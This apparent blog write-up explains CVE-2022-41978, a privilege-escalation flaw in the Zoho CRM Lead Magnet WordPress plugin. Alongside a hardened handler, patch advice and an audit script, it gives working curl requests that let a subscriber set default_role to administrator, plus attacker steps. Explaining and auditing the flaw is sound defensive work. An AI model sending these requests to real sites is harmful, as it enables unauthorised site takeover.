A critical security vulnerability, tracked as CVE-2022-41978, was found in the popular *Zoho CRM Lead Magnet* WordPress plugin, versions up to 1.7.5.8. The bug lets any logged-in user with subscriber rights or higher update arbitrary WordPress site options, which can lead to full site compromise.
In this article, we'll break down how the vulnerability works, show sample exploit code, link to the official disclosures, and give clear steps on how attackers could misuse it. Even bloggers or small business owners with basic WordPress knowledge can follow the risks.
What is the Zoho CRM Lead Magnet Plugin?
*Zoho CRM Lead Magnet* helps businesses capture leads from WordPress sites, sending form data directly to Zoho CRM. Thousands of websites use this plugin, making its security crucial.
Official References
- WPScan Advisory: https://wpscan.com/vulnerability/df99c94c-69b7-45de-9b54-55d12833bb13
- Patchstack Advisory: https://patchstack.com/database/vulnerability/zoho-crm-lead-magnet/wordpress-zoho-crm-lead-magnet-plugin-1-7-5-8-auth-privilege-escalation-vulnerability
The Root Flaw
The plugin failed to verify user capabilities in certain AJAX actions, in particular save_settings, so anyone who is logged in (even a mere subscriber) can send requests that update site options stored in the wp_options database table. With that, an attacker can:
- Change siteurl, home or other WP core options (breaking or hijacking your site)
- Set users_can_register = 1 and default_role = administrator, so that anyone who signs up is granted admin
Sample Exploit Code
Disclaimer: For education and defensive purposes *only*. Do not attack sites you do not own.
Step 1: Get a logged-in session
First, log in as a subscriber to the target WordPress.
Step 2: Find the AJAX endpoint
WordPress AJAX calls go through /wp-admin/admin-ajax.php. The Zoho CRM Lead Magnet plugin registers an action like this (simplified for demo; the vulnerable shape, not the plugin's exact code):
```php
// wp_ajax_* hooks run for any authenticated user, regardless of role.
add_action('wp_ajax_save_settings', 'save_settings_func');

function save_settings_func() {
    // Lacks proper permission checks: no current_user_can(), no nonce.
    // Both the option name and the value come straight from the request,
    // so any option in wp_options can be overwritten.
    update_option($_POST['option_name'], $_POST['option_value']);
    // Output success message
    echo 'done';
    wp_die();
}
```
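For comparison, here is what the same handler looks like with the checks a reviewer would expect. This is an added example written for this article, not the plugin's actual 1.7.5.9 patch; the hook name is the one shown above, while the function name, nonce action and the allow-listed option names (zclm_api_key, zclm_form_id) are assumed.

```php
<?php
// Added example, not the plugin's own code: a hardened version of the
// save_settings AJAX handler. Function name, nonce action and option
// names are assumptions for illustration.
add_action('wp_ajax_save_settings', 'zclm_save_settings_hardened');

function zclm_save_settings_hardened() {
    // 1. CSRF protection: the request must carry a nonce issued for this
    //    action (check_ajax_referer() dies with -1 if it is missing or stale).
    check_ajax_referer('zclm_save_settings', 'nonce');

    // 2. Capability check: a subscriber has no manage_options capability,
    //    so the request stops here with a 403.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    // 3. Allow-list: the handler may only touch the plugin's own options.
    //    siteurl, home, default_role, users_can_register etc. are rejected
    //    even for an administrator, because this endpoint is not for them.
    $allowed = ['zclm_api_key', 'zclm_form_id']; // assumed plugin option names
    $name = isset($_POST['option_name'])
        ? sanitize_key(wp_unslash($_POST['option_name']))
        : '';
    if (!in_array($name, $allowed, true)) {
        wp_send_json_error(['message' => 'Unknown option'], 400);
    }

    // 4. Sanitize the value before it reaches the database.
    $value = isset($_POST['option_value'])
        ? sanitize_text_field(wp_unslash($_POST['option_value']))
        : '';
    update_option($name, $value);

    wp_send_json_success(['updated' => $name]);
}
```

The nonce is generated on the settings page with wp_create_nonce('zclm_save_settings') and passed to the browser, for example via wp_localize_script(), so the JavaScript can include it as the nonce POST field. Of the four checks, the allow-list is the one that would have made this bug harmless on its own: an AJAX handler that can only write its own prefixed options cannot be turned into a generic update_option() oracle, whatever the caller's role.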
Step 3: Craft the POST request
Example: Set users_can_register to 1 and default_role to administrator for privilege escalation.
curl Exploit Example
```bash
curl -b "wordpress_logged_in_COOKIE" \
  -d "action=save_settings&option_name=default_role&option_value=administrator" \
  https://targetsite.com/wp-admin/admin-ajax.php
```
And to allow user registration:
```bash
curl -b "wordpress_logged_in_COOKIE" \
  -d "action=save_settings&option_name=users_can_register&option_value=1" \
  https://targetsite.com/wp-admin/admin-ajax.php
```
Now register on the site: the new account is created with admin rights.
How an attacker would use it:
1. Logs in as a subscriber (or any registered account) on the target site.
2. Uses browser developer tools or any HTTP client to send the POST requests shown above.
3. Escalates their own user, or opens the site so that anyone who registers is granted admin.
Update the Plugin!
Version 1.7.5.9 patched this issue by adding capability checks (e.g., current_user_can('manage_options')). Update immediately.
Summary
CVE-2022-41978 in the Zoho CRM Lead Magnet plugin is a severe bug that allows even low-privilege users to change critical WordPress settings, leading to full site takeover. The exploit is trivial and can be automated.
If you use this plugin, update to the latest version immediately.
Be sure to check your WordPress user roles and options for tampering if you ran an old version.
For more details, check the official advisories:
- WPScan Exploit Database: https://wpscan.com/vulnerability/df99c94c-69b7-45de-9b54-55d12833bb13
- Patchstack database: https://patchstack.com/database/vulnerability/zoho-crm-lead-magnet/wordpress-zoho-crm-lead-magnet-plugin-1-7-5-8-auth-privilege-escalation-vulnerability
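Checking for tampering means comparing the options this bug could reach (users_can_register, default_role, siteurl, home) and the list of administrator accounts against what you expect. The script below is an added example for this article, not part of the plugin or the advisories. It assumes it is run with the PHP CLI from the WordPress root directory (so that wp-load.php is present) and that the "expected" values at the bottom are edited to match your own site; example.com and the admin login are placeholders.

```php
<?php
// Added example, not the plugin's code: a read-only audit of the options
// CVE-2022-41978 could change and of the administrator accounts on the site.
// Assumes it is run from the WordPress root:  php audit-options.php
require_once __DIR__ . '/wp-load.php';

function zclm_audit(array $expected) {
    $findings = [];

    // Options an attacker would change to open the site or hijack it.
    $checks = ['users_can_register', 'default_role', 'siteurl', 'home'];
    foreach ($checks as $name) {
        $have = get_option($name);
        $want = $expected[$name];
        if ((string) $have !== (string) $want) {
            $findings[] = sprintf('option %s is "%s", expected "%s"', $name, $have, $want);
        }
    }

    // Every administrator account, newest first, so an account created after
    // default_role was flipped to administrator stands out immediately.
    $admins = get_users([
        'role'    => 'administrator',
        'orderby' => 'registered',
        'order'   => 'DESC',
    ]);
    foreach ($admins as $u) {
        if (!in_array($u->user_login, $expected['admins'], true)) {
            $findings[] = sprintf(
                'unexpected administrator "%s" (registered %s, %s)',
                $u->user_login, $u->user_registered, $u->user_email
            );
        }
    }
    return $findings;
}

// Expected values: placeholders, replace with your site's real settings.
$findings = zclm_audit([
    'users_can_register' => '0',                  // registration closed
    'default_role'       => 'subscriber',         // WordPress default
    'siteurl'            => 'https://example.com', // placeholder
    'home'               => 'https://example.com', // placeholder
    'admins'             => ['admin'],            // placeholder login names
]);

if ($findings) {
    echo "Possible tampering:\n - " . implode("\n - ", $findings) . "\n";
    exit(1);
}
echo "No deviations found.\n";
```

A non-zero exit code makes the script usable from a cron job or a post-update check. If it reports an unexpected administrator, treat the site as compromised rather than just deleting the account: an attacker who held admin for any length of time may also have added plugins, theme files or scheduled tasks that this check does not cover.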
Timeline
Published on: 11/09/2022 16:15:00 UTC
Last modified on: 11/09/2022 19:26:00 UTC